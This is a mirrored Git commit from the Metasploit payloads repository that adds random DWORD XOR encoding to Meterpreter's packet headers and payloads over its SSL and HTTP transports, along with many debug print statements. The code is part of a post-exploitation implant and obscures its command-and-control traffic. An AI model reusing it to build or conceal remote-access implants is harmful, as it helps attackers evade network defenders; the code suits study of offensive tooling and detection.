github/metasploit-payloads
1
Fork 0
mirror of https://github.com/rapid7/metasploit-payloads synced 2025-06-01 19:54:14 +02:00
Code Releases Activity

Begin to enable DWORD xor out of the box

Browse Source
This commit is contained in:
OJ 2015-12-02 13:30:22 +10:00
parent 3a7dc24a10
commit 5ca5fe89f0
11 changed files with 162 additions and 31 deletions

4
c/meterpreter/source/common/base.c

@ -323,6 +323,7 @@ BOOL command_process_inline(Command *baseCommand, Command *extensionCommand, Rem
// lengths are sane. // lengths are sane.
if (command_validate_arguments(command, packet) != ERROR_SUCCESS) if (command_validate_arguments(command, packet) != ERROR_SUCCESS)
{ {
dprintf("[COMMAND] Command arguments failed to validate");
continue; continue;
} }
@ -660,7 +661,10 @@ DWORD command_validate_arguments(Command *command, Packet *packet)
{ {
case TLV_META_TYPE_STRING: case TLV_META_TYPE_STRING:
if (packet_is_tlv_null_terminated(&current) != ERROR_SUCCESS) if (packet_is_tlv_null_terminated(&current) != ERROR_SUCCESS)
{
dprintf("[COMMAND] string is not null terminated");
res = ERROR_INVALID_PARAMETER; res = ERROR_INVALID_PARAMETER;
}
break; break;
default: default:
break; break;

13
c/meterpreter/source/common/common.c Normal file → Executable file

@ -107,3 +107,16 @@ void enable_debugging()
} }
#endif #endif
VOID xor_bytes(DWORD xorKey, LPBYTE buffer, DWORD bufferSize)
{
dprintf("[OJ] Key : %x", xorKey);
dprintf("[OJ] Length : %x", bufferSize);
LPBYTE xor = (LPBYTE)&xorKey;
for (DWORD i = 0; i < bufferSize; ++i)
{
buffer[i] ^= xor[i % sizeof(DWORD)];
}
}

2
c/meterpreter/source/common/common.h

@ -13,6 +13,7 @@
#include <time.h> #include <time.h>
#define SAFE_FREE(x) {free(x); x = NULL;} #define SAFE_FREE(x) {free(x); x = NULL;}
#define rand_xor_key() ((((rand() % 254) + 1) << 0) | (((rand() % 254) + 1) << 8) | (((rand() % 254) + 1) << 16) | (((rand() % 254) + 1) << 24))
#ifdef _WIN32 #ifdef _WIN32
#include <winsock2.h> #include <winsock2.h>
@ -232,3 +233,4 @@ static _inline void real_dprintf(char *format, ...)
#endif #endif
int current_unix_timestamp(void); int current_unix_timestamp(void);
VOID xor_bytes(DWORD xorKey, LPBYTE buffer, DWORD bufferSize);

7
c/meterpreter/source/common/core.c

@ -155,6 +155,7 @@ Packet *packet_create(PacketTlvType type, LPCSTR method)
{ {
if (!(packet = (Packet *)malloc(sizeof(Packet)))) if (!(packet = (Packet *)malloc(sizeof(Packet))))
{ {
dprintf("[OJ] Packet create failed to malloc");
break; break;
} }
@ -171,6 +172,7 @@ Packet *packet_create(PacketTlvType type, LPCSTR method)
// Add the method TLV if provided // Add the method TLV if provided
if (method && packet_add_tlv_string(packet, TLV_TYPE_METHOD, method) != ERROR_SUCCESS) if (method && packet_add_tlv_string(packet, TLV_TYPE_METHOD, method) != ERROR_SUCCESS)
{ {
dprintf("[OJ] packet create failed to add string for method");
break; break;
} }
@ -258,10 +260,12 @@ Packet *packet_create_response(Packet *request)
if (packet_get_type(request) == PACKET_TLV_TYPE_PLAIN_REQUEST) if (packet_get_type(request) == PACKET_TLV_TYPE_PLAIN_REQUEST)
{ {
dprintf("[OJ] packet is a request");
responseType = PACKET_TLV_TYPE_PLAIN_RESPONSE; responseType = PACKET_TLV_TYPE_PLAIN_RESPONSE;
} }
else else
{ {
dprintf("[OJ] packet is a response");
responseType = PACKET_TLV_TYPE_RESPONSE; responseType = PACKET_TLV_TYPE_RESPONSE;
} }
@ -270,18 +274,21 @@ Packet *packet_create_response(Packet *request)
// Get the request TLV's method // Get the request TLV's method
if (packet_get_tlv_string(request, TLV_TYPE_METHOD, &method) != ERROR_SUCCESS) if (packet_get_tlv_string(request, TLV_TYPE_METHOD, &method) != ERROR_SUCCESS)
{ {
dprintf("[OJ] couldn't get method");
break; break;
} }
// Try to allocate a response packet // Try to allocate a response packet
if (!(response = packet_create(responseType, (PCHAR)method.buffer))) if (!(response = packet_create(responseType, (PCHAR)method.buffer)))
{ {
dprintf("[OJ] failed to create the packet");
break; break;
} }
// Get the request TLV's request identifier // Get the request TLV's request identifier
if (packet_get_tlv_string(request, TLV_TYPE_REQUEST_ID, &requestId) != ERROR_SUCCESS) if (packet_get_tlv_string(request, TLV_TYPE_REQUEST_ID, &requestId) != ERROR_SUCCESS)
{ {
dprintf("[OJ] Failed to get the request ID");
break; break;
} }

9
c/meterpreter/source/common/core.h

@ -194,10 +194,17 @@ typedef struct
PUCHAR buffer; PUCHAR buffer;
} Tlv; } Tlv;
typedef struct
{
DWORD xor_key;
DWORD length;
DWORD type;
} PacketHeader;
/*! @brief Packet definition. */ /*! @brief Packet definition. */
typedef struct _Packet typedef struct _Packet
{ {
TlvHeader header; PacketHeader header;
PUCHAR payload; PUCHAR payload;
ULONG payloadLength; ULONG payloadLength;

4
c/meterpreter/source/extensions/python/python_meterpreter_binding.c Normal file → Executable file

@ -22,8 +22,8 @@ static PyObject* binding_invoke(PyObject* self, PyObject* args)
dprintf("[PYTHON] packet %p is %u bytes and is %s", packetBytes, packetLength, isLocal ? "local" : "not local"); dprintf("[PYTHON] packet %p is %u bytes and is %s", packetBytes, packetLength, isLocal ? "local" : "not local");
Packet packet = { 0 }; Packet packet = { 0 };
packet.header = *(TlvHeader*)packetBytes; packet.header = *(PacketHeader*)packetBytes;
packet.payload = (PUCHAR)(packetBytes + sizeof(TlvHeader)); packet.payload = (PUCHAR)(packetBytes + sizeof(PacketHeader));
packet.payloadLength = (ULONG)packetLength - sizeof(TlvHeader); packet.payloadLength = (ULONG)packetLength - sizeof(TlvHeader);
// If the functionality doesn't require interaction with MSF, then // If the functionality doesn't require interaction with MSF, then

0
c/meterpreter/source/extensions/stdapi/server/railgun/railgun.c Normal file → Executable file

17
c/meterpreter/source/server/server_setup_win.c

@ -320,6 +320,23 @@ DWORD server_setup(MetsrvConfig* config)
srand((unsigned int)time(NULL)); srand((unsigned int)time(NULL));
dprintf("[OJ] Key: %x", rand_xor_key());
dprintf("[OJ] Key: %x", rand_xor_key());
dprintf("[OJ] Key: %x", rand_xor_key());
dprintf("[OJ] Key: %x", rand_xor_key());
dprintf("[OJ] Key: %x", rand_xor_key());
dprintf("[OJ] Key: %x", rand_xor_key());
dprintf("[OJ] Key: %x", rand_xor_key());
dprintf("[OJ] Key: %x", rand_xor_key());
dprintf("[OJ] Key: %x", rand_xor_key());
dprintf("[OJ] Key: %x", rand_xor_key());
dprintf("[OJ] Key: %x", rand_xor_key());
dprintf("[OJ] Key: %x", rand_xor_key());
dprintf("[OJ] Key: %x", rand_xor_key());
dprintf("[OJ] Key: %x", rand_xor_key());
dprintf("[OJ] Key: %x", rand_xor_key());
dprintf("[OJ] Key: %x", rand_xor_key());
__try __try
{ {
do do

2
c/meterpreter/source/server/win/remote_dispatch.c

@ -257,7 +257,9 @@ DWORD request_core_uuid(Remote* remote, Packet* packet)
DWORD request_core_machine_id(Remote* pRemote, Packet* pPacket) DWORD request_core_machine_id(Remote* pRemote, Packet* pPacket)
{ {
DWORD res = ERROR_SUCCESS; DWORD res = ERROR_SUCCESS;
dprintf("[CORE] Running request_core_machine_id");
Packet* pResponse = packet_create_response(pPacket); Packet* pResponse = packet_create_response(pPacket);
dprintf("[CORE] pResponse is %p", pResponse);
if (pResponse) if (pResponse)
{ {

73
c/meterpreter/source/server/win/server_transport_tcp.c Normal file → Executable file

@ -572,7 +572,7 @@ static DWORD packet_receive_via_ssl(Remote *remote, Packet **packet)
DWORD headerBytes = 0, payloadBytesLeft = 0, res; DWORD headerBytes = 0, payloadBytesLeft = 0, res;
CryptoContext *crypto = NULL; CryptoContext *crypto = NULL;
Packet *localPacket = NULL; Packet *localPacket = NULL;
TlvHeader header; PacketHeader header;
LONG bytesRead; LONG bytesRead;
BOOL inHeader = TRUE; BOOL inHeader = TRUE;
PUCHAR payload = NULL; PUCHAR payload = NULL;
@ -586,7 +586,8 @@ static DWORD packet_receive_via_ssl(Remote *remote, Packet **packet)
// Read the packet length // Read the packet length
while (inHeader) while (inHeader)
{ {
if ((bytesRead = SSL_read(ctx->ssl, ((PUCHAR)&header + headerBytes), sizeof(TlvHeader)-headerBytes)) <= 0) dprintf("[OJ] trying to read header (%u so far)", headerBytes);
if ((bytesRead = SSL_read(ctx->ssl, ((PUCHAR)&header + headerBytes), sizeof(PacketHeader)-headerBytes)) <= 0)
{ {
if (!bytesRead) if (!bytesRead)
{ {
@ -599,30 +600,57 @@ static DWORD packet_receive_via_ssl(Remote *remote, Packet **packet)
SetLastError(ERROR_NOT_FOUND); SetLastError(ERROR_NOT_FOUND);
} }
dprintf("[OJ] failed with %u 0x%x ", GetLastError(), GetLastError());
break; break;
} }
headerBytes += bytesRead; headerBytes += bytesRead;
if (headerBytes != sizeof(TlvHeader)) if (headerBytes != sizeof(PacketHeader))
{ {
dprintf("[OJ] need more bytes ...");
continue; continue;
} }
inHeader = FALSE; inHeader = FALSE;
} }
if (headerBytes != sizeof(TlvHeader)) if (headerBytes != sizeof(PacketHeader))
{ {
break; break;
} }
header.xor_key = ntohl(header.xor_key);
// xor the header data
LPBYTE csr = (LPBYTE)&header;
dprintf("[OJ] header bytes have been read");
dprintf("[OJ] Before: 0x%02x 0x%02x 0x%02x 0x%02x 0x%02x 0x%02x 0x%02x 0x%02x 0x%02x 0x%02x 0x%02x 0x%02x 0x%02x", csr[0],
csr[1], csr[2], csr[3], csr[4],
csr[5], csr[6], csr[7], csr[8],
csr[9], csr[10], csr[11], csr[12]);
xor_bytes(header.xor_key, (LPBYTE)&header.length, 8);
dprintf("[OJ] After: 0x%02x 0x%02x 0x%02x 0x%02x 0x%02x 0x%02x 0x%02x 0x%02x 0x%02x 0x%02x 0x%02x 0x%02x 0x%02x", csr[0],
csr[1], csr[2], csr[3], csr[4],
csr[5], csr[6], csr[7], csr[8],
csr[9], csr[10], csr[11], csr[12]);
dprintf("[OJ] xor key address: 0x%p", &header.xor_key);
dprintf("[OJ] Length address: 0x%p", &header.length);
// Initialize the header // Initialize the header
header.length = header.length; header.length = ntohl(header.length);
header.type = header.type;
payloadLength = ntohl(header.length) - sizeof(TlvHeader); // use TlvHeader size here, because the length doesn't include the xor byte
payloadLength = header.length - sizeof(TlvHeader);
payloadBytesLeft = payloadLength; payloadBytesLeft = payloadLength;
dprintf("[OJ] total length is: %u", payloadLength);
// Allocate the payload // Allocate the payload
if (!(payload = (PUCHAR)malloc(payloadLength))) if (!(payload = (PUCHAR)malloc(payloadLength)))
{ {
@ -664,6 +692,26 @@ static DWORD packet_receive_via_ssl(Remote *remote, Packet **packet)
break; break;
} }
dprintf("[OJ] Payload start Before: 0x%02x 0x%02x 0x%02x 0x%02x 0x%02x 0x%02x 0x%02x 0x%02x 0x%02x 0x%02x 0x%02x 0x%02x 0x%02x", payload[0],
payload[1], payload[2], payload[3], payload[4],
payload[5], payload[6], payload[7], payload[8],
payload[9], payload[10], payload[11], payload[12]);
dprintf("[OJ] Payload end Before: 0x%02x 0x%02x 0x%02x 0x%02x 0x%02x 0x%02x 0x%02x 0x%02x 0x%02x 0x%02x 0x%02x 0x%02x 0x%02x", payload[payloadLength - 13 + 0],
payload[payloadLength - 13 + 1], payload[payloadLength - 13 + 2], payload[payloadLength - 13 + 3], payload[payloadLength - 13 + 4],
payload[payloadLength - 13 + 5], payload[payloadLength - 13 + 6], payload[payloadLength - 13 + 7], payload[payloadLength - 12 + 8],
payload[payloadLength - 13 + 9], payload[payloadLength - 13 + 10], payload[payloadLength - 13 + 11], payload[payloadLength - 13 + 12]);
xor_bytes(header.xor_key, payload, payloadLength);
dprintf("[OJ] Payload start After : 0x%02x 0x%02x 0x%02x 0x%02x 0x%02x 0x%02x 0x%02x 0x%02x 0x%02x 0x%02x 0x%02x 0x%02x 0x%02x", payload[0],
payload[1], payload[2], payload[3], payload[4],
payload[5], payload[6], payload[7], payload[8],
payload[9], payload[10], payload[11], payload[12]);
dprintf("[OJ] Payload end After : 0x%02x 0x%02x 0x%02x 0x%02x 0x%02x 0x%02x 0x%02x 0x%02x 0x%02x 0x%02x 0x%02x 0x%02x 0x%02x", payload[payloadLength - 13 + 0],
payload[payloadLength - 13 + 1], payload[payloadLength - 13 + 2], payload[payloadLength - 13 + 3], payload[payloadLength - 13 + 4],
payload[payloadLength - 13 + 5], payload[payloadLength - 13 + 6], payload[payloadLength - 13 + 7], payload[payloadLength - 12 + 8],
payload[payloadLength - 13 + 9], payload[payloadLength - 13 + 10], payload[payloadLength - 13 + 11], payload[payloadLength - 13 + 12]);
// Allocate a packet structure // Allocate a packet structure
if (!(localPacket = (Packet *)malloc(sizeof(Packet)))) if (!(localPacket = (Packet *)malloc(sizeof(Packet))))
{ {
@ -1066,6 +1114,15 @@ DWORD packet_transmit_via_ssl(Remote* remote, Packet* packet, PacketRequestCompl
packet->header.length = htonl(packet->payloadLength + sizeof(TlvHeader)); packet->header.length = htonl(packet->payloadLength + sizeof(TlvHeader));
} }
dprintf("[PACKET] New xor key for sending");
packet->header.xor_key = rand_xor_key();
// before transmission, xor the whole lot, starting with the body
xor_bytes(packet->header.xor_key, (LPBYTE)packet->payload, packet->payloadLength);
// then the header
xor_bytes(packet->header.xor_key, (LPBYTE)&packet->header.length, 8);
// be sure to switch the xor header before writing
packet->header.xor_key = htonl(packet->header.xor_key);
idx = 0; idx = 0;
while (idx < sizeof(packet->header)) while (idx < sizeof(packet->header))
{ {
@ -1089,6 +1146,8 @@ DWORD packet_transmit_via_ssl(Remote* remote, Packet* packet, PacketRequestCompl
break; break;
} }
dprintf("[OJ] packet header sent");
idx = 0; idx = 0;
while (idx < packet->payloadLength) while (idx < packet->payloadLength)
{ {

44
c/meterpreter/source/server/win/server_transport_winhttp.c

@ -278,15 +278,17 @@ static DWORD packet_transmit_http(Remote *remote, Packet *packet, PacketRequestC
HttpTransportContext* ctx = (HttpTransportContext*)remote->transport->ctx; HttpTransportContext* ctx = (HttpTransportContext*)remote->transport->ctx;
unsigned char *buffer; unsigned char *buffer;
buffer = malloc(packet->payloadLength + sizeof(TlvHeader)); DWORD totalLength = packet->payloadLength + sizeof(PacketHeader);
buffer = malloc(totalLength);
if (!buffer) if (!buffer)
{ {
SetLastError(ERROR_NOT_FOUND); SetLastError(ERROR_NOT_FOUND);
return 0; return 0;
} }
memcpy(buffer, &packet->header, sizeof(TlvHeader)); memcpy(buffer, &packet->header, sizeof(PacketHeader));
memcpy(buffer + sizeof(TlvHeader), packet->payload, packet->payloadLength); memcpy(buffer + sizeof(PacketHeader), packet->payload, packet->payloadLength);
do do
{ {
@ -296,7 +298,7 @@ static DWORD packet_transmit_http(Remote *remote, Packet *packet, PacketRequestC
break; break;
} }
result = ctx->send_req(hReq, buffer, packet->payloadLength + sizeof(TlvHeader)); result = ctx->send_req(hReq, buffer, totalLength);
if (!result) if (!result)
{ {
@ -308,7 +310,7 @@ static DWORD packet_transmit_http(Remote *remote, Packet *packet, PacketRequestC
dprintf("[PACKET TRANSMIT] request sent.. apparently"); dprintf("[PACKET TRANSMIT] request sent.. apparently");
} while(0); } while(0);
memset(buffer, 0, packet->payloadLength + sizeof(TlvHeader)); memset(buffer, 0, totalLength);
ctx->close_req(hReq); ctx->close_req(hReq);
return res; return res;
} }
@ -381,6 +383,17 @@ static DWORD packet_transmit_via_http(Remote *remote, Packet *packet, PacketRequ
packet->header.length = htonl(packet->payloadLength + sizeof(TlvHeader)); packet->header.length = htonl(packet->payloadLength + sizeof(TlvHeader));
} }
dprintf("[PACKET] New xor key for sending");
packet->header.xor_key = rand_xor_key();
dprintf("[PACKET] XOR Encoding payload");
// before transmission, xor the whole lot, starting with the body
xor_bytes(packet->header.xor_key, (LPBYTE)packet->payload, packet->payloadLength);
dprintf("[PACKET] XOR Encoding header");
// then the header
xor_bytes(packet->header.xor_key, (LPBYTE)&packet->header.length, 8);
// be sure to switch the xor header before writing
packet->header.xor_key = htonl(packet->header.xor_key);
dprintf("[PACKET] Transmitting packet of length %d to remote", packet->payloadLength); dprintf("[PACKET] Transmitting packet of length %d to remote", packet->payloadLength);
res = packet_transmit_http(remote, packet, completion); res = packet_transmit_http(remote, packet, completion);
if (res < 0) if (res < 0)
@ -414,7 +427,7 @@ static DWORD packet_receive_http(Remote *remote, Packet **packet)
DWORD headerBytes = 0, payloadBytesLeft = 0, res; DWORD headerBytes = 0, payloadBytesLeft = 0, res;
CryptoContext *crypto = NULL; CryptoContext *crypto = NULL;
Packet *localPacket = NULL; Packet *localPacket = NULL;
TlvHeader header; PacketHeader header;
LONG bytesRead; LONG bytesRead;
BOOL inHeader = TRUE; BOOL inHeader = TRUE;
PUCHAR payload = NULL; PUCHAR payload = NULL;
@ -469,7 +482,7 @@ static DWORD packet_receive_http(Remote *remote, Packet **packet)
while (inHeader && retries > 0) while (inHeader && retries > 0)
{ {
retries--; retries--;
if (!ctx->read_response(hReq, (PUCHAR)&header + headerBytes, sizeof(TlvHeader)-headerBytes, &bytesRead)) if (!ctx->read_response(hReq, (PUCHAR)&header + headerBytes, sizeof(PacketHeader)-headerBytes, &bytesRead))
{ {
dprintf("[PACKET RECEIVE HTTP] Failed HEADER read_response: %d", GetLastError()); dprintf("[PACKET RECEIVE HTTP] Failed HEADER read_response: %d", GetLastError());
SetLastError(ERROR_NOT_FOUND); SetLastError(ERROR_NOT_FOUND);
@ -489,7 +502,7 @@ static DWORD packet_receive_http(Remote *remote, Packet **packet)
headerBytes += bytesRead; headerBytes += bytesRead;
if (headerBytes != sizeof(TlvHeader)) if (headerBytes != sizeof(PacketHeader))
{ {
continue; continue;
} }
@ -502,18 +515,22 @@ static DWORD packet_receive_http(Remote *remote, Packet **packet)
break; break;
} }
if (headerBytes != sizeof(TlvHeader)) if (headerBytes != sizeof(PacketHeader))
{ {
dprintf("[PACKET RECEIVE HTTP] headerBytes no valid"); dprintf("[PACKET RECEIVE HTTP] headerBytes no valid");
SetLastError(ERROR_NOT_FOUND); SetLastError(ERROR_NOT_FOUND);
break; break;
} }
dprintf("[PACKET RECEIVE HTTP] decoding header");
header.xor_key = ntohl(header.xor_key);
xor_bytes(header.xor_key, (LPBYTE)&header.length, 8);
header.length = ntohl(header.length);
// Initialize the header // Initialize the header
vdprintf("[PACKET RECEIVE HTTP] initialising header"); vdprintf("[PACKET RECEIVE HTTP] initialising header");
header.length = header.length; // use TlvHeader size here, because the length doesn't include the xor byte
header.type = header.type; payloadLength = header.length - sizeof(TlvHeader);
payloadLength = ntohl(header.length) - sizeof(TlvHeader);
payloadBytesLeft = payloadLength; payloadBytesLeft = payloadLength;
// Allocate the payload // Allocate the payload
@ -553,6 +570,9 @@ static DWORD packet_receive_http(Remote *remote, Packet **packet)
break; break;
} }
dprintf("[PACKET RECEIVE HTTP] decoding payload");
xor_bytes(header.xor_key, payload, payloadLength);
// Allocate a packet structure // Allocate a packet structure
if (!(localPacket = (Packet *)malloc(sizeof(Packet)))) if (!(localPacket = (Packet *)malloc(sizeof(Packet))))
{ {